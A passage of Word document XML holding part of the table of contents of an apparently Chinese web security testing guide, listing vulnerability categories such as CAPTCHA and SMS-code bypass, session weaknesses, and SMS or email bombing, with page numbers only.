                <w:rPr>
                  <w:noProof/>
                  <w:webHidden/>
                </w:rPr>
                <w:fldChar w:fldCharType="separate"/>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:noProof/>
                  <w:webHidden/>
                </w:rPr>
                <w:t>58</w:t>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:noProof/>
                  <w:webHidden/>
                </w:rPr>
                <w:fldChar w:fldCharType="end"/>
              </w:r>
            </w:hyperlink>
          </w:p>
          <w:p w14:paraId="5031CB96"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24" w:history="1">
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:rStyle w:val="ad"/>
                  <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial"/>
                  <w:b w:val="0"/>
                  <w:noProof/>
                  <w:sz w:val="21"/>
                </w:rPr>
                <w:t xml:space="preserve">2.11 </w:t>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:rStyle w:val="ad"/>
                  <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial"/>
                  <w:b w:val="0"/>
                  <w:noProof/>
                  <w:sz w:val="21"/>
                </w:rPr>
                <w:t>防护功能失效</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2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59</w:t>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial"/>
                  <w:b w:val="0"/>
                  <w:noProof/>
                  <w:webHidden/>
                  <w:sz w:val="21"/>
                </w:rPr>
                <w:fldChar w:fldCharType="end"/>
              </w:r>
            </w:hyperlink>
          </w:p>
          <w:p w14:paraId="215C076B" w14:textId="77777777" w:rsidR="004952DA" w:rsidRPr="00FE1E9A" w:rsidRDefault="000B549D" w:rsidP="009165FF">
            <w:pPr>
              <w:pStyle w:val="33"/>
              <w:rPr>
                <w:rFonts w:cstheme="minorBidi"/>
                <w:noProof/>
                <w:snapToGrid/>
                <w:kern w:val="2"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink w:anchor="_Toc498434525" w:history="1">
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:rStyle w:val="ad"/>
                  <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial"/>
                  <w:noProof/>
                  <w:sz w:val="21"/>
                </w:rPr>
                <w:t xml:space="preserve">2.11.1 </w:t>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:rStyle w:val="ad"/>
                  <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial"/>
                  <w:noProof/>
                  <w:sz w:val="21"/>
                </w:rPr>
                <w:t>账号弱锁定机制</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5 \h </w:instrText>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:noProof/>
                  <w:webHidden/>
                </w:rPr>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:noProof/>
                  <w:webHidden/>
                </w:rPr>
                <w:fldChar w:fldCharType="separate"/>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:noProof/>
                  <w:webHidden/>
                </w:rPr>
                <w:t>59</w:t>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:noProof/>
                  <w:webHidden/>
                </w:rPr>
                <w:fldChar w:fldCharType="end"/>
              </w:r>
            </w:hyperlink>
          </w:p>
          <w:p w14:paraId="62956A1D" w14:textId="77777777" w:rsidR="004952DA" w:rsidRPr="00FE1E9A" w:rsidRDefault="000B549D" w:rsidP="009165FF">
            <w:pPr>
              <w:pStyle w:val="33"/>
              <w:rPr>
                <w:rFonts w:cstheme="minorBidi"/>
                <w:noProof/>
                <w:snapToGrid/>
                <w:kern w:val="2"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink w:anchor="_Toc498434526" w:history="1">
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:rStyle w:val="ad"/>
                  <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial"/>
                  <w:noProof/>
                  <w:sz w:val="21"/>
                </w:rPr>
                <w:t xml:space="preserve">2.11.2 </w:t>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:rStyle w:val="ad"/>
                  <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial"/>
                  <w:noProof/>
                  <w:sz w:val="21"/>
                </w:rPr>
                <w:t>图形验证码可自动获取</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6 \h </w:instrText>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:noProof/>
                  <w:webHidden/>
                </w:rPr>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:noProof/>
                  <w:webHidden/>
                </w:rPr>
                <w:fldChar w:fldCharType="separate"/>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:noProof/>
                  <w:webHidden/>
                </w:rPr>
                <w:t>59</w:t>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:noProof/>
                  <w:webHidden/>
                </w:rPr>
                <w:fldChar w:fldCharType="end"/>
              </w:r>
            </w:hyperlink>
          </w:p>
          <w:p w14:paraId="1914B700" w14:textId="77777777" w:rsidR="004952DA" w:rsidRPr="00FE1E9A" w:rsidRDefault="000B549D" w:rsidP="009165FF">
            <w:pPr>
              <w:pStyle w:val="33"/>
              <w:rPr>
                <w:rFonts w:cstheme="minorBidi"/>
                <w:noProof/>
                <w:snapToGrid/>
                <w:kern w:val="2"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink w:anchor="_Toc498434527" w:history="1">
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:rStyle w:val="ad"/>
                  <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial"/>
                  <w:noProof/>
                  <w:sz w:val="21"/>
                </w:rPr>
                <w:t xml:space="preserve">2.11.3 </w:t>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:rStyle w:val="ad"/>
                  <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial"/>
                  <w:noProof/>
                  <w:sz w:val="21"/>
                </w:rPr>
                <w:t>图形验证码绕过</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7 \h </w:instrText>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:noProof/>
                  <w:webHidden/>
                </w:rPr>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:noProof/>
                  <w:webHidden/>
                </w:rPr>
                <w:fldChar w:fldCharType="separate"/>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:noProof/>
                  <w:webHidden/>
                </w:rPr>
                <w:t>60</w:t>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:noProof/>
                  <w:webHidden/>
                </w:rPr>
                <w:fldChar w:fldCharType="end"/>
              </w:r>
            </w:hyperlink>
          </w:p>
          <w:p w14:paraId="4ABD3405" w14:textId="77777777" w:rsidR="004952DA" w:rsidRPr="00FE1E9A" w:rsidRDefault="000B549D" w:rsidP="009165FF">
            <w:pPr>
              <w:pStyle w:val="33"/>
              <w:rPr>
                <w:rFonts w:cstheme="minorBidi"/>
                <w:noProof/>
                <w:snapToGrid/>
                <w:kern w:val="2"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink w:anchor="_Toc498434528" w:history="1">
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:rStyle w:val="ad"/>
                  <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial"/>
                  <w:noProof/>
                  <w:sz w:val="21"/>
                </w:rPr>
                <w:t xml:space="preserve">2.11.4 </w:t>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:rStyle w:val="ad"/>
                  <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial"/>
                  <w:noProof/>
                  <w:sz w:val="21"/>
                </w:rPr>
                <w:t>短信验证码绕过</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8 \h </w:instrText>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:noProof/>
                  <w:webHidden/>
                </w:rPr>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:noProof/>
                  <w:webHidden/>
                </w:rPr>
                <w:fldChar w:fldCharType="separate"/>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:noProof/>
                  <w:webHidden/>
                </w:rPr>
                <w:t>61</w:t>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:noProof/>
                  <w:webHidden/>
                </w:rPr>
                <w:fldChar w:fldCharType="end"/>
              </w:r>
            </w:hyperlink>
          </w:p>
          <w:p w14:paraId="5781866C" w14:textId="77777777" w:rsidR="004952DA" w:rsidRPr="00FE1E9A" w:rsidRDefault="000B549D" w:rsidP="009165FF">
            <w:pPr>
              <w:pStyle w:val="33"/>
              <w:rPr>
                <w:rFonts w:cstheme="minorBidi"/>
                <w:noProof/>
                <w:snapToGrid/>
                <w:kern w:val="2"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink w:anchor="_Toc498434529" w:history="1">
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:rStyle w:val="ad"/>
                  <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial"/>
                  <w:noProof/>
                  <w:sz w:val="21"/>
                </w:rPr>
                <w:t xml:space="preserve">2.11.5 </w:t>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:rStyle w:val="ad"/>
                  <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial"/>
                  <w:noProof/>
                  <w:sz w:val="21"/>
                </w:rPr>
                <w:t>短信验证码可暴力破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9 \h </w:instrText>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:noProof/>
                  <w:webHidden/>
                </w:rPr>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:noProof/>
                  <w:webHidden/>
                </w:rPr>
                <w:fldChar w:fldCharType="separate"/>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:noProof/>
                  <w:webHidden/>
                </w:rPr>
                <w:t>62</w:t>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:noProof/>
                  <w:webHidden/>
                </w:rPr>
                <w:fldChar w:fldCharType="end"/>
              </w:r>
            </w:hyperlink>
          </w:p>
          <w:p w14:paraId="1F0EB893" w14:textId="77777777" w:rsidR="004952DA" w:rsidRPr="00FE1E9A" w:rsidRDefault="000B549D" w:rsidP="009165FF">
            <w:pPr>
              <w:pStyle w:val="33"/>
              <w:rPr>
                <w:rFonts w:cstheme="minorBidi"/>
                <w:noProof/>
                <w:snapToGrid/>
                <w:kern w:val="2"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink w:anchor="_Toc498434530" w:history="1">
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:rStyle w:val="ad"/>
                  <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial"/>
                  <w:noProof/>
                  <w:sz w:val="21"/>
                </w:rPr>
                <w:t xml:space="preserve">2.11.6 </w:t>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:rStyle w:val="ad"/>
                  <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial"/>
                  <w:noProof/>
                  <w:sz w:val="21"/>
                </w:rPr>
                <w:t>参数覆盖</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0 \h </w:instrText>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:noProof/>
                  <w:webHidden/>
                </w:rPr>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:noProof/>
                  <w:webHidden/>
                </w:rPr>
                <w:fldChar w:fldCharType="separate"/>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:noProof/>
                  <w:webHidden/>
                </w:rPr>
                <w:t>63</w:t>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:noProof/>
                  <w:webHidden/>
                </w:rPr>
                <w:fldChar w:fldCharType="end"/>
              </w:r>
            </w:hyperlink>
          </w:p>
          <w:p w14:paraId="12CBA2FE" w14:textId="77777777" w:rsidR="004952DA" w:rsidRPr="00FE1E9A" w:rsidRDefault="000B549D" w:rsidP="009165FF">
            <w:pPr>
              <w:pStyle w:val="33"/>
              <w:rPr>
                <w:rFonts w:cstheme="minorBidi"/>
                <w:noProof/>
                <w:snapToGrid/>
                <w:kern w:val="2"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink w:anchor="_Toc498434531" w:history="1">
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:rStyle w:val="ad"/>
                  <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial"/>
                  <w:noProof/>
                  <w:sz w:val="21"/>
                </w:rPr>
                <w:t xml:space="preserve">2.11.7 </w:t>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:rStyle w:val="ad"/>
                  <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial"/>
                  <w:noProof/>
                  <w:sz w:val="21"/>
                </w:rPr>
                <w:t>关键逻辑判断前端验证</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1 \h </w:instrText>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:noProof/>
                  <w:webHidden/>
                </w:rPr>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:noProof/>
                  <w:webHidden/>
                </w:rPr>
                <w:fldChar w:fldCharType="separate"/>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:noProof/>
                  <w:webHidden/>
                </w:rPr>
                <w:t>66</w:t>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:noProof/>
                  <w:webHidden/>
                </w:rPr>
                <w:fldChar w:fldCharType="end"/>
              </w:r>
            </w:hyperlink>
          </w:p>
          <w:p w14:paraId="2938979B"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32" w:history="1">
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:rStyle w:val="ad"/>
                  <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial"/>
                  <w:b w:val="0"/>
                  <w:noProof/>
                  <w:sz w:val="21"/>
                </w:rPr>
                <w:t xml:space="preserve">2.12 </w:t>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:rStyle w:val="ad"/>
                  <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial"/>
                  <w:b w:val="0"/>
                  <w:noProof/>
                  <w:sz w:val="21"/>
                </w:rPr>
                <w:t>防护功能缺失</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32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67</w:t>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial"/>
                  <w:b w:val="0"/>
                  <w:noProof/>
                  <w:webHidden/>
                  <w:sz w:val="21"/>
                </w:rPr>
                <w:fldChar w:fldCharType="end"/>
              </w:r>
            </w:hyperlink>
          </w:p>
          <w:p w14:paraId="7B1CEB06" w14:textId="77777777" w:rsidR="004952DA" w:rsidRPr="00FE1E9A" w:rsidRDefault="000B549D" w:rsidP="009165FF">
            <w:pPr>
              <w:pStyle w:val="33"/>
              <w:rPr>
                <w:rFonts w:cstheme="minorBidi"/>
                <w:noProof/>
                <w:snapToGrid/>
                <w:kern w:val="2"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink w:anchor="_Toc498434533" w:history="1">
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:rStyle w:val="ad"/>
                  <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial"/>
                  <w:noProof/>
                  <w:sz w:val="21"/>
                </w:rPr>
                <w:t>2.12.1 Cookie</w:t>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:rStyle w:val="ad"/>
                  <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial"/>
                  <w:noProof/>
                  <w:sz w:val="21"/>
                </w:rPr>
                <w:t>属性问题</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3 \h </w:instrText>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:noProof/>
                  <w:webHidden/>
                </w:rPr>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:noProof/>
                  <w:webHidden/>
                </w:rPr>
                <w:fldChar w:fldCharType="separate"/>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:noProof/>
                  <w:webHidden/>
                </w:rPr>
                <w:t>67</w:t>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:noProof/>
                  <w:webHidden/>
                </w:rPr>
                <w:fldChar w:fldCharType="end"/>
              </w:r>
            </w:hyperlink>
          </w:p>
          <w:p w14:paraId="1F713D97" w14:textId="77777777" w:rsidR="004952DA" w:rsidRPr="00FE1E9A" w:rsidRDefault="000B549D" w:rsidP="009165FF">
            <w:pPr>
              <w:pStyle w:val="33"/>
              <w:rPr>
                <w:rFonts w:cstheme="minorBidi"/>
                <w:noProof/>
                <w:snapToGrid/>
                <w:kern w:val="2"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink w:anchor="_Toc498434534" w:history="1">
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:rStyle w:val="ad"/>
                  <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial"/>
                  <w:noProof/>
                  <w:sz w:val="21"/>
                </w:rPr>
                <w:t xml:space="preserve">2.12.2 </w:t>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:rStyle w:val="ad"/>
                  <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial"/>
                  <w:noProof/>
                  <w:sz w:val="21"/>
                </w:rPr>
                <w:t>会话重用</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4 \h </w:instrText>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:noProof/>
                  <w:webHidden/>
                </w:rPr>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:noProof/>
                  <w:webHidden/>
                </w:rPr>
                <w:fldChar w:fldCharType="separate"/>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:noProof/>
                  <w:webHidden/>
                </w:rPr>
                <w:t>69</w:t>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:noProof/>
                  <w:webHidden/>
                </w:rPr>
                <w:fldChar w:fldCharType="end"/>
              </w:r>
            </w:hyperlink>
          </w:p>
          <w:p w14:paraId="56549FCC" w14:textId="77777777" w:rsidR="004952DA" w:rsidRPr="00FE1E9A" w:rsidRDefault="000B549D" w:rsidP="009165FF">
            <w:pPr>
              <w:pStyle w:val="33"/>
              <w:rPr>
                <w:rFonts w:cstheme="minorBidi"/>
                <w:noProof/>
                <w:snapToGrid/>
                <w:kern w:val="2"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink w:anchor="_Toc498434535" w:history="1">
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:rStyle w:val="ad"/>
                  <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial"/>
                  <w:noProof/>
                  <w:sz w:val="21"/>
                </w:rPr>
                <w:t xml:space="preserve">2.12.3 </w:t>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:rStyle w:val="ad"/>
                  <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial"/>
                  <w:noProof/>
                  <w:sz w:val="21"/>
                </w:rPr>
                <w:t>会话失效时间过长</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5 \h </w:instrText>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:noProof/>
                  <w:webHidden/>
                </w:rPr>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:noProof/>
                  <w:webHidden/>
                </w:rPr>
                <w:fldChar w:fldCharType="separate"/>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:noProof/>
                  <w:webHidden/>
                </w:rPr>
                <w:t>70</w:t>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:noProof/>
                  <w:webHidden/>
                </w:rPr>
                <w:fldChar w:fldCharType="end"/>
              </w:r>
            </w:hyperlink>
          </w:p>
          <w:p w14:paraId="07833C11"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36" w:history="1">
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:rStyle w:val="ad"/>
                  <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial"/>
                  <w:b w:val="0"/>
                  <w:noProof/>
                  <w:sz w:val="21"/>
                </w:rPr>
                <w:t xml:space="preserve">2.13 </w:t>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:rStyle w:val="ad"/>
                  <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial"/>
                  <w:b w:val="0"/>
                  <w:noProof/>
                  <w:sz w:val="21"/>
                </w:rPr>
                <w:t>防护功能滥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3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71</w:t>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial"/>
                  <w:b w:val="0"/>
                  <w:noProof/>
                  <w:webHidden/>
                  <w:sz w:val="21"/>
                </w:rPr>
                <w:fldChar w:fldCharType="end"/>
              </w:r>
            </w:hyperlink>
          </w:p>
          <w:p w14:paraId="50A3FB51" w14:textId="77777777" w:rsidR="004952DA" w:rsidRPr="00FE1E9A" w:rsidRDefault="000B549D" w:rsidP="009165FF">
            <w:pPr>
              <w:pStyle w:val="33"/>
              <w:rPr>
                <w:rFonts w:cstheme="minorBidi"/>
                <w:noProof/>
                <w:snapToGrid/>
                <w:kern w:val="2"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink w:anchor="_Toc498434537" w:history="1">
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:rStyle w:val="ad"/>
                  <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial"/>
                  <w:noProof/>
                  <w:sz w:val="21"/>
                </w:rPr>
                <w:t xml:space="preserve">2.13.1 </w:t>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:rStyle w:val="ad"/>
                  <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial"/>
                  <w:noProof/>
                  <w:sz w:val="21"/>
                </w:rPr>
                <w:t>恶意锁定问题</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7 \h </w:instrText>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:noProof/>
                  <w:webHidden/>
                </w:rPr>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:noProof/>
                  <w:webHidden/>
                </w:rPr>
                <w:fldChar w:fldCharType="separate"/>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:noProof/>
                  <w:webHidden/>
                </w:rPr>
                <w:t>71</w:t>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:noProof/>
                  <w:webHidden/>
                </w:rPr>
                <w:fldChar w:fldCharType="end"/>
              </w:r>
            </w:hyperlink>
          </w:p>
          <w:p w14:paraId="3DED3389" w14:textId="77777777" w:rsidR="004952DA" w:rsidRPr="00FE1E9A" w:rsidRDefault="000B549D" w:rsidP="009165FF">
            <w:pPr>
              <w:pStyle w:val="33"/>
              <w:rPr>
                <w:rFonts w:cstheme="minorBidi"/>
                <w:noProof/>
                <w:snapToGrid/>
                <w:kern w:val="2"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink w:anchor="_Toc498434538" w:history="1">
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:rStyle w:val="ad"/>
                  <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial"/>
                  <w:noProof/>
                  <w:sz w:val="21"/>
                </w:rPr>
                <w:t xml:space="preserve">2.13.2 </w:t>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:rStyle w:val="ad"/>
                  <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial"/>
                  <w:noProof/>
                  <w:sz w:val="21"/>
                </w:rPr>
                <w:t>短信炸弹</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8 \h </w:instrText>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:noProof/>
                  <w:webHidden/>
                </w:rPr>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:noProof/>
                  <w:webHidden/>
                </w:rPr>
                <w:fldChar w:fldCharType="separate"/>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:noProof/>
                  <w:webHidden/>
                </w:rPr>
                <w:t>71</w:t>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:noProof/>
                  <w:webHidden/>
                </w:rPr>
                <w:fldChar w:fldCharType="end"/>
              </w:r>
            </w:hyperlink>
          </w:p>
          <w:p w14:paraId="4FDED1D4" w14:textId="77777777" w:rsidR="004952DA" w:rsidRPr="00FE1E9A" w:rsidRDefault="000B549D" w:rsidP="009165FF">
            <w:pPr>
              <w:pStyle w:val="33"/>
              <w:rPr>
                <w:rFonts w:cstheme="minorBidi"/>
                <w:noProof/>
                <w:snapToGrid/>
                <w:kern w:val="2"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink w:anchor="_Toc498434539" w:history="1">
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:rStyle w:val="ad"/>
                  <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial"/>
                  <w:noProof/>
                  <w:sz w:val="21"/>
                </w:rPr>
                <w:t xml:space="preserve">2.13.3 </w:t>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:rStyle w:val="ad"/>
                  <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial"/>
                  <w:noProof/>
                  <w:sz w:val="21"/>
                </w:rPr>
                <w:t>邮件炸弹</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9 \h </w:instrText>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:noProof/>
                  <w:webHidden/>
                </w:rPr>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:noProof/>
                  <w:webHidden/>
                </w:rPr>
